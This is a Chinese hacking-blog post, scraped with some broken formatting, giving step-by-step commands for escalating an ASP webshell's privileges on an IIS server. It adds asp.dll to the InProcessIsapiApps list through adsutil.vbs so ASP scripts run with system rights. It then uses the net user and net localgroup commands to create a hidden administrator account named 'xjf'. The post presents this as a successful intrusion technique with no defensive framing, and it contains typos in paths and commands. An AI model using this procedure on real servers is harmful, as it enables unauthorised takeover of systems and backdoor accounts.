C:\WINNT\
32\inetsrv\asp.dll 这个ISAPI
添加到/LM/W3SVCInProcessIsapiApps里面首先我看看iis
配置
和asp木马权限adsutil.vbs get /W3SVC/InProcessIsapiApps
先用下面命令取得当前
InProcessIsapiApps列表:c:\winnt\sytem32\inetsrv>cscript.exe adsutil.vbs get /W3SVC/InProcessIsapiApps
inprocessisapiapps :(LIST) (5 Items)
"c:\winnt\system32\idq.dll"
"c:\winnt\system32\inetsrv\httpext.dll"
"c:\winnt\system32\inetsrv\ssinc.dll"
"c:\winnt\system32\nswprt.dll"
---没有asp
然后把asp.dll加进/LM/W3SVCInProcessIsapiApps里面
c:\winnt\sytem32\inetsrv>adsutil.vbs
/W3SVC/InProcessIsapiApps "c:\winnt\system32\inetsrv\asp.asp"
"c:\winnt\system32\idq.dll"
"c:\winnt\system32\inetsrv\httpext.dll"
"c:\winnt\system32\inetsrv\ssinc.dll"
"c:\winnt\system32\nswprt.dll"
现在看看asp木马
权限我们加
个用户xjf并提升为管理员看看.net user xjf ***** /add
net lcoalgroup administrators xjf /add----哈哈...成功了.
不过需要注意
adsutil.vbs只能设不能改所以用adsutil.vbs时候定要把原先也加上,否则原先就会丢失区别条目的间用空格分开最后,谢谢mix提供思路...篇文章: 熟练掌握runas安全调试及运行篇文章: txt炸弹
最新评论